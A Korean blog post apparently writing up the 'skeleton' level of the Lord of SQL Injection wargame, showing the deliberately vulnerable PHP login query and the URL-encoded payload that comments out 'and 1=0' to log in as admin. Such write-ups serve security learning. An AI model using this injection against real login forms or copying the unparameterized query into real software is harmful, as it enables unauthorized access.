티스토리 뷰

Web_Hacking/LOS

[LOS] skeleton

MitNy 2017. 8. 21. 16:00



<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  
$query "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id'] == 'admin'solve("skeleton"); 
  
highlight_file(__FILE__); 
?>



skeleton 문제는 and 1=0 이 새로 추가 되었고 id는 admin이어야 문제가 풀린다.



and 1=0부분을 주석처리하면 되겠다 싶어서

?pw=1234%27%20or%20id=%27admin%27%20--


이렇게 입력을 했었는데


-- 뒤에 공백이 없어서 안됐었다.




그래서 이렇게 -- 뒤에 %20 을 추가해줬다.

?pw=1234%27%20or%20id=%27admin%27%20--%20 





skeleton 클리어!




'Web_Hacking > LOS' 카테고리의 다른 글

[LOS] golem  (0) 2017.08.21
[LOS] vampire  (0) 2017.08.21
[LOS] troll  (0) 2017.08.14
[LOS] orge  (0) 2017.08.13
[LOS] darkelf  (0) 2017.08.13
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30
글 보관함